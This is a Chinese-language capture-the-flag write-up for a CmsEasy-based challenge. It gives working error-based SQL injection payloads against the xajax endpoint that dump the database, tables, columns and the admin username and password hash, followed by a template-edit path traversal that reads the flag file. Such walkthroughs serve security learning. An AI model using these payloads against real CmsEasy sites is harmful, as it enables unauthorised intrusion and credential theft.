首先,拿到这种cms的题,
1,要先判断是什么类型的cms
2,搜索这种cms的漏洞。
3,利用该漏洞
一,判断cms:
1,在该站内找找有没有什么标识,这道题的标识在下载处有cmseasy
2,搜索手机版 - 购物车 - 留言 - 繁体 - 注册 / 登陆
,可以在网上找到一大堆相同cms的网站。
在下方找到了cms名字:
3,看到这里有详细的信息,百度一下。
二,查找easycms曾经出现的漏洞
发送url:
http://localhost/Cmseasy/celive/live/header.php
postdata:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx
%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
直接利用漏洞注入:
爆库:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(database()) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
爆表,每次只能加31
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(table_name) from information_schema.tables where table_schema=database()),32,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
[yesercms_a_attachment,yesercms_a_comment,yesercms_a_rank,yesercms_a_vote,yesercms_activity,yesercms_announcement,yesercms_archive,yesercms_assigns,yesercms_b_arctag,yesercms_b_area,yesercms_b_category,yesercms_b_special,yesercms_b_tag,yesercms_ballot,yesercms_bbs_archive,yesercms_bbs_category,yesercms_bbs_label,yesercms_bbs_reply,yesercms_chat,yesercms_departments,yesercms_de
这里表太多了,看了看writeup都是直接用的yesercms_user表,,,难道是我头太铁了
2,爆字段
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(column_name) from information_schema.columns where table_name='yesercms_user'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
3,爆字段类容
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(username,password) from yesercms_user),32,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((select/**/group_concat(username,password) from yesercms_user),32,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
adminff512d4240cbbdeafada404677ccbe61
md5解密
admin-Yeser231
登录:
做到这里就不知道怎么做了,看了看题解才知道要抓模板->当前模板编辑->编辑
的包
修改文件为../../flag.php